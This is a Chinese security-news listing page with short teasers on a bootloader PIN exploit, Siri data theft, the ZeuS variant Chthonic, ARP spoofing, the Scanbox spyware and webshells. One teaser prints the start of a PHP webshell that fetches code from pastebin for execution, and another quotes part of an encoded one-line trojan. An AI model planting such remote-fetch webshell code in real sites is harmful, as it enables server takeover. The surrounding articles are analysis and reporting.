您的位置:首页 > 菜鸟学院 > 资讯列表

  • 利用HTC One漏洞破解手机PIN密码
    利用HTC One漏洞破解手机PIN密码

    HTCOne手机运行的是Android4.2.2、HBOOT1.54.0000,它存在一个名为Bootloader的漏洞。这个漏洞早在2014年2月份就报告给了HTC官方,并在次月就修复了该漏洞。在得到HTC官方同意后,我们现在就将整个漏洞利用测试过程发布出来。read_emmc命令在2011发布的HTCDesireZ

    来源:互联网 时间:2015-01-23 阅读次数:2596 

  • 利用Siri窃取苹果iPhone/iPad数据的方法
    利用Siri窃取苹果iPhone/iPad数据的方法

    FreeBuf科普:什么是Siri?Siri是苹果公司在其产品iPhone4S,iPadAir及以上版本手机上应用的一项语音控制功能。Siri可以令iPhone4S及以上(iPadAir)变身为一台智能化机器人,利用Siri用户可以通过手机读短信、介绍餐厅、询问天气、语音设置闹钟等。Siri可以支持

    来源:互联网 时间:2015-01-23 阅读次数:1122 

  • 使用调试器对安卓APP进行安全测试
    使用调试器对安卓APP进行安全测试

    1、所需工具下面列举了本次攻击演示所需要的所有工具:Windows/MacOSX/LinuxJava(推荐1.7版本)IDE(Eclipse,IntelliJIDEA,AndroidStudio,三者任选其一)AndroidSDK(https://developer.android.com/sdk/index.html?hl=i)APKTool(https://code.google.com/p

    来源:互联网 时间:2015-01-23 阅读次数:2372 

  • 更加瘦小的12寸MacBook Air来袭,可能只保留一个USB-C型接口
    更加瘦小的12寸MacBook Air来袭,可能只保留一个USB-C型接口

    据9to5Mac报道,苹果今年发布的新款12英寸MacBookAir中,可能会去除全尺寸USB接口、MagSafe电源接口、Thunderbolt显示屏接口和SD读卡器,而改用单USB-C型接口。这款笔记本将比11寸的MacBookAir还薄大约四分之一英寸。它被视为2012年Retina屏推出后,苹果笔记本最

    来源:互联网 时间:2015-01-23 阅读次数:1462 

  • 中国网站安全报告发布 网站服务器41.2%存后门
    中国网站安全报告发布 网站服务器41.2%存后门

    日前,国内最大的互联网安全公司360(NYSE:QIHU)发布了《2014年中国网站安全报告》(以下简称《报告》),《报告》指出,2014年,网络安全问题呈现网站漏洞大规模爆发、大量隐私泄露等重大安全事件高发和网站攻击开始规模化、产业化等显著特点。预计2015年,网站

    来源:互联网 时间:2015-01-22 阅读次数:1189 

  • 深入解读MS14-068漏洞:微软精心策划的后门?
    深入解读MS14-068漏洞:微软精心策划的后门?

    0×0背景微软(2014-11-18)发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决MicrosoftWindowsKerberosKDC漏洞(CVE-2014-6324),该漏洞允许黑客提升任意普通用户权限成为域管理员(DomainAdmin)身份。

    来源:互联网 时间:2015-01-22 阅读次数:1692 

  • 华为mate7卡刷教程
    华为mate7卡刷教程

      --华为mate7卡刷步骤  1.首先将下载来的*.zip刷机包解压,刷机包主文件名为:UPDATE.APP,在dload文件夹下,我们将dload整个文件夹拷贝到手机内(文件夹内包含刷机包)如图:  2.确认刷机包已经放入dload文件夹下,然后将手机关机;关机状态下同时按住【音量

    来源:互联网 时间:2015-01-22 阅读次数:1133 

  • 揭秘网银大盗ZeuS的最新变种银行木马Chthonic
    揭秘网银大盗ZeuS的最新变种银行木马Chthonic

    说到Zeus/Zbot,做安全多多少少都会有所了解。Zeus是对金融系统威胁最大的僵尸网络之一,控制者借助僵尸程序窃取账户登录信息和信用卡号码。Zbot往往通过垃圾邮件来传播,中招的会下载一个程序,这个程序会控制网银,偷取信息。近期卡巴斯基实验室发现了一款ZeuS

    来源:互联网 时间:2015-01-22 阅读次数:1613 

  • 技术分析:智能硬件蠕虫威胁互联网安全
    技术分析:智能硬件蠕虫威胁互联网安全

    引用:前日起(12月10日)全球互联网范围DNS流量异常。云堤团队(DamDDoS)迅速参与分析处置。本次事件攻击自12月10日凌晨起至今仍在持续,为近年来持续时间最长的DNSDDoS攻击,目前已监测到的攻击最大流量近1亿Qps(约合76.38Gbps)跟踪:12月10日,DNS异常故障时

    来源:互联网 时间:2015-01-22 阅读次数:1063 

  • Arp欺骗原理及Android环境下的检测方法
    Arp欺骗原理及Android环境下的检测方法

    测试环境说明网关:IP:172.20.150.1mac:24050FCE53靶机(手机):IP:172.20.150.20mac:000822D806D2攻击主机(虚拟机):IP:172.20.150.2mac:6C40089A1F16Wifi接入点(360免费wifi):BSSID:24050FCE53(就是网关的mac),SSID:private(wifi名称)攻击场

    来源:互联网 时间:2015-01-22 阅读次数:1213 

  • Javascript间谍脚本分析:Web恶意程序Scanbox源码分析与演示
    Javascript间谍脚本分析:Web恶意程序Scanbox源码分析与演示

    背景“ScanBox相当危险,它只需在web浏览器上执行Javascript代码即可启动键盘记录窃听,不需要在你的计算机上植入任何恶意程序即可盗取主机信息。”这份名为Scanbox的恶意代码是具有信息收集和键盘记录等间谍功能的Javascript恶意脚本,适用于IE浏览器。Scanbox具

    来源:互联网 时间:2015-01-22 阅读次数:1396 

  • 关于免杀一句话木马的解密还原
    关于免杀一句话木马的解密还原

    一次巡查服务器的时候,发现网站存在漏洞,并已被植入后门。因为服务器有安全狗,由此断定后门代码是免杀的。首先我们看看加密的源码其中加色部分$drx.$ydd.$hq.$qvz按照排列依次拼接“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4i

    来源:互联网 时间:2015-01-21 阅读次数:2535 

  • 关于webshell的思路 - pastebin
    关于webshell的思路 - pastebin

    这两天某国外黑客写了一篇文章关于他发现的一种webshell中使用的手法,大体说说思路,原文就不翻译了,我懒。简单来说就是通过一个很简单的代码远程通过pastebin下载代码并且执行。if(array_keys($_GET)[0]=='up'){$content=file_get_contents('http://pastebin.c

    来源:互联网 时间:2015-01-21 阅读次数:1213 

  • lnmp虚拟主机安全配置研究
    lnmp虚拟主机安全配置研究

    众所周知,虚拟主机的安全不好做,特别是防止跨目录成为了重点。apache+php服务器防止跨目录的方式比较简单,网上的所有成熟虚拟主机解决方案都是基于apache的,如directadmin、cpanel。但如今已然不是apache的时代了,在linux+nginx+mysql+php下怎么防止不同虚拟

    来源:互联网 时间:2015-01-21 阅读次数:1031 

扫二维码进入好特网手机版本!

扫二维码进入好特网微信公众号!

本站所有软件,都由网友上传,如有侵犯你的版权,请发邮件tougao@haote.com

湘ICP备17003333号-1 湘公网安备:43070202000427号 © 2013~2016 haote.com 好特网